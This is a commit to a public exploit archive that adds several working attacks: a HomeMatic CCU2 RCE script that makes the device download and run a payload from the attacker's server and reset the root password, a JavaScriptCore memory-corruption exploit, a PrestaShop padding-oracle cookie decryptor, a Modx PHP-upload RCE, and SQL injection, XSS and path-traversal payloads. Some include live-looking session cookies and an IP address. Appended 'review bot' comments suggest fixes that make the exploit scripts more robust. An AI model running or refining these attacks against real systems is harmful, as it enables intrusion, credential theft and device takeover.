DB: 2018-07-19

8 changes to exploits/shellcodes

JavaScript Core - Arbitrary Code Execution
QNAP Q'Center - change_passwd Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs RCE (Metasploit)
QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
HomeMatic Zentrale CCU2 - Remote Code Execution

MailGust 1.9 - Board Takeover SQL Injection
MailGust 1.9 - Board Takeover (SQL Injection)

Cyphor 0.19 - Board Takeover SQL Injection
Cyphor 0.19 - Board Takeover (SQL Injection)

versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection
versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)

WordPress 2.6.1 - SQL Column Truncation Admin Takeover
WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)

Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Takeover

Joomla! < 3.6.4 - Admin TakeOver
Joomla! < 3.6.4 - Admin Takeover
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection
Open-AudIT Community 2.1.1 - Cross-Site Scripting
FTP2FTP 1.0 - Arbitrary File Download
Modx Revolution < 2.6.4 - Remote Code Execution
Offensive Security 2018-07-19 05:01:43 +00:00
parent 1f88d0a67a
commit a2ac269de5
9 changed files with 2080 additions and 8 deletions

140
exploits/hardware/remote/45052.py Executable file

@ -0,0 +1,140 @@
# Exploit Title: HomeMatic Zentrale CCU2 Unauthenticated RCE
# Date: 16-07-2018
# Software Link: https://www.homematic.com/
# Exploit Author: Kacper Szurek - ESET
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
1. Description
File: /root/www/api/backup/logout.cgi
```
proc main { } {
set sid [getQueryArg sid]
if [catch { session_logout $sid}] { error LOGOUT }
puts "Content-Type: text/plain"
puts ""
puts "OK"
}
```
`$sid` value is passed directly to `session_logout` function.
File: /root/www/tcl/eq3/session.tcl
```
proc session_logout { sid } {
rega_exec "system.ClearSessionID(\"$sid\");"
}
```
`$sid` value is not escaped properly.
We can close current rega script using `");` and execute our payload.
2. Proof of Concept
POC in Python which enable ssh access and change root password without any credentials.
```
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import time
import urllib2
import threading
import sys
import os
import signal
print "HomeMatic Zentrale CCU2 Unauthenticated RCE"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek - ESET"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek\n"
def signal_handler(a, b):
print "[+] Exit"
os._exit(0)
signal.signal(signal.SIGINT, signal_handler)
if len(sys.argv) != 4:
print "Usage: exploit <your_ip> <homematic_ip> <new_password>"
os._exit(0)
our_ip = sys.argv[1]
homematic_ip = sys.argv[2]
new_password = sys.argv[3]
tcl_file = """
#!/bin/tclsh
source /www/api/eq3/jsonrpc.tcl
source /www/api/eq3/json.tcl
set args(passwd) "{}"
set args(mode) "true"
source /www/api/methods/ccu/setssh.tcl
source /www/api/methods/ccu/setsshpassword.tcl
source /www/api/methods/ccu/restartsshdaemon.tcl
""".format(new_password)
class StoreHandler(BaseHTTPRequestHandler):
def do_GET(self):
print self.path
if self.path == '/exploit':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(tcl_file)
def server():
try:
server = HTTPServer((our_ip, 1234), StoreHandler)
server.serve_forever()
except Exception, e:
print "[-] Cannot start web server: {}".format(e)
os._exit(0)
def send_payload(payload):
return urllib2.urlopen('http://{}/api/backup/logout.cgi?sid=aa");system.Exec("{}");system.ClearSessionID("bb'.format(homematic_ip, payload)).read()
try:
version = urllib2.urlopen('http://{}/api/backup/version.cgi'.format(homematic_ip), timeout=6).read()
except:
version = ""
if not version.startswith('VERSION='):
print "[-] Probably not HomeMatic IP: {}".format(homematic_ip)
os._exit(0)
if "'" in new_password or '"' in new_password:
print "[-] Forbidden characters in password"
os._exit(0)
print "[+] Start web server"
t = threading.Thread(target=server)
t.daemon = True
t.start()
time.sleep(2)
print "[+] Download exploit"
send_payload('wget+-O+/tmp/exploit+http://{}:1234/exploit&&chmod+%2bx+/tmp/exploit'.format(our_ip))
print "[+] Set chmod +x"
send_payload('chmod+%2bx+/tmp/exploit')
print "[+] Execute exploit"
send_payload('/bin/tclsh+/tmp/exploit')
print "[+] Success, now you can ssh as root:"
print "ssh root@{}".format(homematic_ip)
print "Password: {}".format(new_password)
os._exit(0)
```
3. Solution:
Update to version 2.35.16
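Review bot: `send_payload` calls `urllib2.urlopen(...)` with no `timeout`, while the version probe inside the `try:` a few lines further down passes `timeout=6`, so a host that accepts the connection but never answers leaves the script (and its daemon HTTP thread) hanging indefinitely; pass the same value there, `urllib2.urlopen(url, timeout=6).read()`. The bare `except:` around that probe also turns any unrelated error (a typo-level `NameError` included) into the "Probably not HomeMatic IP" message; `except urllib2.URLError:` (plus `socket.timeout` if `socket` is imported) keeps the fallback without hiding bugs. The rendered hunk has lost the indentation of `StoreHandler.do_GET` and `server`, so their bodies cannot be checked from here.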


@ -0,0 +1,323 @@
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var jsval_magic = new Int64('0x3232323232323232').asDouble();
var structs = [];
function log(x) {
print(x);
}
// Look OOB for array we can use with JSValues
function findArrayOOB(corrupted_arr, groom) {
log("Looking for JSValue array with OOB Float array");
for (let i = 0; i<corrupted_arr.length; i++) {
convf[0] = corrupted_arr[i];
// Find the magic value we stored in the JSValue Array
if (convi[0] == 0x10) {
convf[0] = corrupted_arr[i+1];
if (convi[0] != 0x32323232)
continue;
// Change the first element of the array
corrupted_arr[i+1] = new Int64('0x3131313131313131').asDouble();
let target = null;
// Find which array we modified
for (let j = 0; j<groom.length; j++) {
if (groom[j][0] != jsval_magic) {
target = groom[j];
break
}
}
log("Found target array for addrof/fakeobj");
// This object will hold our primitives
let prims = {};
let oob_ind = i+1;
// Get the address of a given jsobject
prims.addrof = function(x) {
// To do this we put the object in the jsvalue array and
// access it OOB with our float array
target[0] = x;
return Int64.fromDouble(corrupted_arr[oob_ind]);
}
// Return a jsobject at a given address
prims.fakeobj = function(addr) {
// To do this we overwrite the first slot of the jsvalue array
// with the OOB float array
corrupted_arr[oob_ind] = addr.asDouble();
return target[0];
}
return prims;
}
}
}
// Here we will spray structure IDs for Float64Arrays
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function sprayStructures() {
function randomString() {
return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5);
}
// Spray arrays for structure id
for (let i = 0; i < 0x1000; i++) {
let a = new Float64Array(1);
// Add a new property to create a new Structure instance.
a[randomString()] = 1337;
structs.push(a);
}
}
// Here we will create our fake typed array and get arbitrary read/write
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function getArb(prims) {
sprayStructures()
let utarget = new Uint8Array(0x10000);
utarget[0] = 0x41;
// Our fake array
// Structure id guess is 0x200
// [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)]
let jscell = new Int64('0x0118270000000200');
// Construct the object
// Each attribute will set 8 bytes of the fake object inline
obj = {
'a': jscell.asDouble(),
// Butterfly can be anything
'b': false,
// Target we want to write to
'c': utarget,
// Length and flags
'd': new Int64('0x0001000000000010').asDouble()
};
// Get the address of the values we stored in obj
let objAddr = prims.addrof(obj).add(16);
log("Obj addr + 16 = "+objAddr);
// Create a fake object from this pointer
let fakearray = prims.fakeobj(objAddr);
// Attempt to find a valid ID for our fake object
while(!(fakearray instanceof Float64Array)) {
jscell.add(1);
obj['a'] = jscell.asDouble();
}
log("Matched structure id!");
// Set data at a given address
prims.set = function(addr, arr) {
fakearray[2] = addr.asDouble();
utarget.set(arr);
}
// Read 8 bytes as an Int64 at a given address
prims.read64 = function(addr) {
fakearray[2] = addr.asDouble();
let bytes = Array(8);
for (let i=0; i<8; i++) {
bytes[i] = utarget[i];
}
return new Int64(bytes);
}
// Write an Int64 as 8 bytes at a given address
prims.write64 = function(addr, value) {
fakearray[2] = addr.asDouble();
utarget.set(value.bytes);
}
}
// Here we will use build primitives to eventually overwrite the JIT page
function exploit(corrupted_arr, groom) {
save.push(groom);
save.push(corrupted_arr);
// Create fakeobj and addrof primitives
let prims = findArrayOOB(corrupted_arr, groom);
// Upgrade to arb read/write from OOB read/write
getArb(prims);
// Build an arbitrary JIT function
// This was basically just random junk to make the JIT function larger
let jit = function(x) {
var j = []; j[0] = 0x6323634;
return x*5 + x - x*x /0x2342513426 +(x - x+0x85720642 *(x +3 -x / x+0x41424344)/0x41424344)+j[0]; };
// Make sure the JIT function has been compiled
jit();
jit();
jit();
// Traverse the JSFunction object to retrieve a non-poisoned pointer
log("Finding jitpage");
let jitaddr = prims.read64(
prims.read64(
prims.read64(
prims.read64(
prims.addrof(jit).add(3*8)
).add(3*8)
).add(3*8)
).add(5*8)
);
log("Jit page addr = "+jitaddr);
// Overwrite the JIT code with our INT3s
log("Writting shellcode over jit page");
prims.set(jitaddr.add(32), [0xcc, 0xcc, 0xcc, 0xcc]);
// Call the JIT function, triggering our INT3s
log("Calling jit function");
jit();
throw("JIT returned");
}
// Find and set the length of a non-freed butterfly with our unstable OOB primitive
function setLen(uaf_arr, ind) {
let f=0;
for (let i=0; i<uaf_arr.length; i++) {
convf[0] = uaf_arr[i];
// Look for a new float array, and set the length
if (convi[0] == 0x10) {
convf[0] = uaf_arr[i+1];
if (convi[0] == 0x32323232 && convi[1] == 0x32323232) {
convi[0] = 0x42424242;
convi[1] = 0x42424242;
uaf_arr[i] = convf[0];
return;
}
}
}
throw("Could not find anouther array to corrupt");
}
let oob_rw_unstable = null;
let oob_rw_unstable_ind = null;
let oob_rw_stable = null;
// After this point we would stop seeing GCs happen enough to race :(
const limit = 10;
const butterfly_size = 32
let save = [0, 0]
for(let at = 0; at < limit; at++) {
log("Trying to race GC and array.reverse() Attempt #"+(at+1));
// Allocate the initial victim and target arrays
let victim_arrays = new Array(2048);
let groom = new Array(2048);
for (let i=0; i<victim_arrays.length; i++) {
victim_arrays[i] = new Array(butterfly_size).fill(floatarr_magic)
groom[i] = new Array(butterfly_size/2).fill(jsval_magic)
}
let vv = [];
let v = []
// Allocate large strings to trigger the GC while calling reverse
for (let i = 0; i < 506; i++) {
for(let j = 0; j < 0x100; j++) {
// Cause GCs to trigger while we are racing with reverse
if (j == 0x44) { v.push(new String("B").repeat(0x10000*save.length/2)) }
victim_arrays.reverse()
}
}
for (let i = 0; i < victim_arrays.length; i++) {
// Once we see we have replaced a free'd butterfly
// fill the replacing array with 0x41414141... to smash rest
// of UAF'ed butterflies
// We know the size will be 506, because it will have been replaced with v
// we were pushing into in the loop above
if(victim_arrays[i].length == 506) {
victim_arrays[i].fill(2261634.5098039214)
}
// Find the first butterfly we have smashed
// this will be an unstable OOB r/w
if(victim_arrays[i].length == 0x41414141) {
oob_rw_unstable = victim_arrays[i];
oob_rw_unstable_ind = i;
break;
}
}
// If we successfully found a smashed and still freed butterfly
// use it to corrupt a non-freed butterfly for stability
if(oob_rw_unstable) {
setLen(oob_rw_unstable, oob_rw_unstable_ind)
for (let i = 0; i < groom.length; i++) {
// Find which array we just corrupted
if(groom[i].length == 0x42424242) {
oob_rw_stable = groom[i];
break;
}
}
if (!oob_rw_stable) {
throw("Groom seems to have failed :(");
}
}
// chew CPU to avoid a segfault and help with gc schedule
for (let i = 0; i < 0x100000; i++) { }
// Attempt to clean up some
let f = []
for (let i = 0; i < 0x2000; i++) {
f.push(new Array(16).fill(2261634.6098039214))
}
save.push(victim_arrays)
save.push(v)
save.push(f)
save.push(groom)
if (oob_rw_stable) {
log("Found stable corrupted butterfly! Now the fun begins...");
exploit(oob_rw_stable, groom);
break;
}
}
throw("Failed to find any UAF'ed butterflies");
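Review bot: `floatarr_magic` is declared twice with identical `var floatarr_magic = new Int64('0x3131313131313131').asDouble();` lines near the top of the file; the second declaration is dead and should be removed. In `getArb`, `obj = {` is assigned without `let`/`const`, so it becomes an implicit global in non-strict code — if that is deliberate (keeping the object reachable after the function returns), say so with a comment such as `// intentionally global so the backing object outlives getArb`, otherwise declare it. `setLen(uaf_arr, ind)` never uses `ind` or its local `let f=0;`, and the file throws plain strings (`throw("...")`) instead of `Error` objects, which drops the stack trace; `throw new Error("...")` is the conventional form.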


@ -0,0 +1,68 @@
#######################################
# Exploit Title: Open-AudIT Community - 2.1.1 - Cross Site Scripting Vulnerability
# Google Dork:NA
# #######################################
# Exploit Author: Ranjeet Jaiswal#
#######################################
# Vendor Homepage: https://opmantek.com/
# Software Link:http://dl-openaudit.opmantek.com/OAE-Win-x86_64-
release_2.2.1.exe
# Affected Version: 2.1.1
# Category: WebApps
# Tested on: Windows 10
# CVE : CVE-2018-11124
#
# 1. Vendor Description:
#
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
Discover what's on your network
Open-AudIT is the world's leading network discovery, inventory and audit
program. Used by over 10,000 customers.
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in Attributes functionality in
Open-AudIT Community edition before 2.2.2 allows remote attackers to inject
arbitrary web script or HTML via a crafted attribute name of a Attribute,
as demonstrated in below POC.
#
# 3. Proof Of Concept:
3.1. Proof of Concept for Injecting html contain
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<p>Sorry! We have moved! The new URL is: <a href="http://geektyper.com/">
Open-Audit</a></p>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.You will see redirection
hyperlink.
Step8:When user click on link ,User will be redirected to Attacker or
malicious website.
3.2. Proof of Concept for Injecting web script(Cross-site scripting(XSS))
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<script>alert(hack)</script>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.Alert Popup will execute.
# 4. Solution:
#
# Upgrade to latest release of Open-AudIT version
# https://opmantek.com/network-tools-download/open-audit/
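Review bot: The version information in this advisory is inconsistent: the header says `# Affected Version: 2.1.1`, the Software Link points at an `OAE-Win-x86_64-release_2.2.1.exe` installer, and the Technical Description says versions `before 2.2.2` are affected, while the Solution only says "latest release". State one affected range and the first fixed version explicitly, e.g. `# Affected Version: < 2.2.2 (tested on 2.1.1)` and `# 4. Solution: Upgrade to Open-AudIT Community 2.2.2 or later`, assuming 2.2.2 is indeed the fix release as the description implies. The Vendor Description paragraph and the step lists drop the `#` comment prefix on several lines, which makes the file harder to read as one block; prefix them consistently.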

95
exploits/php/webapps/45046.py Executable file

@ -0,0 +1,95 @@
#!/usr/bin/env python3
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
# See https://ambionics.io/blog/prestashop-privilege-escalation
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
import requests
import urllib.parse
import base64
s = requests.Session()
"""
s.proxies = {
'http': 'localhost:8080',
'https': 'localhost:8080',
}
#"""
# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
# Parse blocks and size
cookie_name, cookie_value = cookie.split("=")
cookie_value = urllib.parse.unquote(cookie_value)
cookie_size = cookie_value[-6:]
cookie_value = cookie_value[:-6]
cookie_value = base64.b64decode(cookie_value)
BLOCK_SIZE = 16
def test_padding(data):
"""Returns true if the padding is correct, false otherwise.
One can easily adapt it for customer cookies using:
index.php?controller=identity
"""
data = base64.b64encode(data).decode()
data = urllib.parse.quote(data)
data = data + cookie_size
s.cookies[cookie_name] = data
r = s.get(URL, allow_redirects=False)
s.cookies.clear()
return 'AdminLogin' not in r.headers.get('Location', '')
def e(msg):
print(msg)
exit(1)
if not test_padding(cookie_value):
e("Invalid cookie (1)")
elif test_padding(b"~~~~~"):
e("Invalid cookie (2)")
# Perform the padding oracle attack
result = b''
for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
obtained = []
current_block = cookie_value[(b ) * BLOCK_SIZE:][:BLOCK_SIZE]
precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
for p in range(BLOCK_SIZE):
nb_obtained = len(obtained)
for i in range(256):
pad = nb_obtained + 1
prelude = (
b"\x00" * (BLOCK_SIZE - pad) +
bytes([i]) +
bytes([o ^ pad for o in obtained][::-1])
)
data = cookie_value + prelude + current_block
if test_padding(data):
print("Got byte #%d of block #%d: %d" % (p, b, i))
obtained.append(i ^ pad)
break
else:
e("Unable to decode position %d" % p)
# Compute the contents of the plaintext block
result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
try:
print("COOKIE: %s" % result.decode())
except UnicodeDecodeError:
print("COOKIE: Unable to decode, wait for next block")
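Review bot: `URL` and `cookie` are hard-coded with what looks like a real admin path and session cookie for one host, and the comment above them tells the reader to paste their own in; take both from `sys.argv` (leaving obvious placeholders in the file) so the PoC does not ship a live-looking credential. `cookie_name, cookie_value = cookie.split("=")` assumes exactly one `=` in the string; `cookie.split("=", 1)` is the safe form. `e()` calls the site-injected builtin `exit(1)`; `sys.exit(1)` with `import sys` is the portable spelling. The loop variable `p` of `for p in range(BLOCK_SIZE)` is reused as the comprehension target in `bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])` — harmless in Python 3 because the comprehension scopes its own name, but renaming the inner one (e.g. `pb`) avoids the confusion.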



@ -0,0 +1,52 @@
# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection
# Google Dork: N/A
# Date: 17.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919
# Version: 3.3
# Tested on: Kali linux
====================================================
The vulnerability allows an attacker to inject sql commands
from the search section with 'contact_type_id' parameter in the admin panel.
# PoC : SQLi :
http://site.net/phonebook/contact_list_data
POST /phonebook/contact_list_data HTTP/1.1
Host: site.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.net/phonebook/contact_list
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Cookie:
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a;
xerone_dolphin=6811071531824070937
Connection: keep-alive
first_name=Test&last_name=test&phone_number=5555555&email=test%40test.com
&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10
Parameter: contact_type_id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE
WHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE
'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: client_username=tes&contact_type_id=142' AND
EXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT
(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE
'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
====================================================
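Review bot: The sample request embeds a live-looking `ci_session` cookie, a `xerone_dolphin` value and a public IP address (`213.14.165.138`) while the host is already the placeholder `site.net`; none of those values matter to the finding and they should be redacted the same way. The shown POST body sends `contact_type_id=280&is_searched=1&page=1&rows=10`, but the two `Payload:` lines reference `client_username`, `permission_search` and `search_page` parameters that do not appear in that request, so it is unclear which request the payloads belong to; a one-line note stating which request body the `contact_type_id` value is substituted into would remove the ambiguity. The advisory also lacks a Solution section; stating whether the vendor was notified and which version fixes it would match the other entries in this commit.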


@ -0,0 +1,34 @@
# Exploit Title: FTP2FTP 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 18.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ftp2ftp-server-to-server-file-transfer-php-script/21972395
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "download2.php" is vulnerable in the admin panel.
The attacker can download and read all files known by the name via 'id' parameter.
====================================================
# Vuln file : /FTP2FTP/download2.php
1. <?php
2. $file = "tempFiles2/".$_GET['id'];
3.
4.
5. if (file_exists($file)) {
6. header('Content-Description: File Transfer');
7. header('Content-Type: application/octet-stream');
8. header('Content-Disposition: attachment; filename="'.basename($file).'"');
9. header('Expires: 0');
10. header('Cache-Control: must-revalidate');
11. header('Pragma: public');
12. header('Content-Length: ' . filesize($file));
13. readfile($file);
14. exit;
15. }
16. ?>
# PoC : http://sitenet/FTP2FTP/download2.php?id=../index.php
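Review bot: Unlike the other advisories in this commit, this one has no Solution/mitigation section. The quoted `download2.php` concatenates `$_GET['id']` straight onto `"tempFiles2/"` and serves whatever `file_exists()` accepts; the fix is to strip path components and canonicalise before reading, e.g. `$file = realpath("tempFiles2/" . basename($_GET['id']));` followed by a check that `$file` is not `false` and still starts with the `realpath("tempFiles2")` prefix, and to keep the endpoint behind the admin authentication the Description says it sits in. A `# Solution:` line carrying that guidance (or the vendor's fixed version, if one exists) would round out the advisory.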

85
exploits/php/webapps/45055.py Executable file

@ -0,0 +1,85 @@
# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
# Date: 2018-07-13
# Exploit Author: Vitalii Rudnykh
# Vendor Homepage: https://modx.com/
# Version: <= 2.6.4
# CVE : CVE-2018-1000207
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import requests
from colorama import init, Fore, Style
try:
init()
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
print(Fore.BLUE +
'################################################################')
print(Fore.CYAN +
'# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
print('# by Vitalii Rudnykh')
print('# Thanks by AgelNash')
print('# https://github.com/a2u/CVE-2018-1000207/')
print(Fore.BLUE +
'################################################################')
print('Provided only for educational or information purposes')
print(Style.RESET_ALL)
target = input('Enter target url (example: http(s)://domain.tld/): ')
verify = True
code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'
if requests.get(
target + '/connectors/system/phpthumb.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/connectors/system/phpthumb.php - found')
url = target + '/connectors/system/phpthumb.php'
payload = {
'ctx': 'web',
'cache_filename': '../../payload.php',
'useRawIMoutput': '1',
'src': '.',
'IMresizedData': code,
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
check = requests.get(target + 'payload.php', verify=verify)
if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(Fore.RED + 'phpthumb.php - not found')
if requests.get(
target + '/assets/components/gallery/connector.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/assets/components/gallery/connector.php - found')
url = target + '/assets/components/gallery/connector.php'
payload = {
'action': 'web/phpthumb',
'f': 'php',
'useRawIMoutput': '1',
'IMresizedData': 'Ok',
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
if r.text == 'Ok':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(
Fore.RED + '/assets/components/gallery/connector.php - not found')
except KeyboardInterrupt:
cls()
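Review bot: The `#!/usr/bin/env python3` and `# -*- coding: utf-8 -*-` lines sit after six header comment lines, so neither is honoured — a shebang only works as the first line and the coding declaration only on line 1 or 2; move them to the top of the file. URL joining is inconsistent: `target + '/connectors/system/phpthumb.php'` and `target + '/assets/components/gallery/connector.php'` add a leading slash while `target + 'payload.php'` does not, so the verification GET builds a wrong path for an input without a trailing slash and the other two build `//` paths with one; normalise once with `target = target.rstrip('/')` after `input()` and use the leading-slash form everywhere. The `r` returned by the first `requests.post(...)` is never read, and `colorama` is a third-party import not mentioned in the header; a `# requires: requests, colorama` line would help. Wrapping the whole script, including `def cls()`, in one `try:` just to catch `KeyboardInterrupt` is unusual; a narrower `try:` around the interactive part reads better.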


@ -9818,6 +9818,7 @@ id,file,description,date,author,type,platform,port
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16624,8 +16625,9 @@ id,file,description,date,author,type,platform,port
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -16792,13 +16794,13 @@ id,file,description,date,author,type,platform,port
1221,exploits/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,webapps,php,
1225,exploits/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,webapps,php,
1226,exploits/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,webapps,php,
1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,webapps,php,
1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover (SQL Injection)",2005-09-24,rgod,webapps,php,
1236,exploits/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",webapps,cgi,
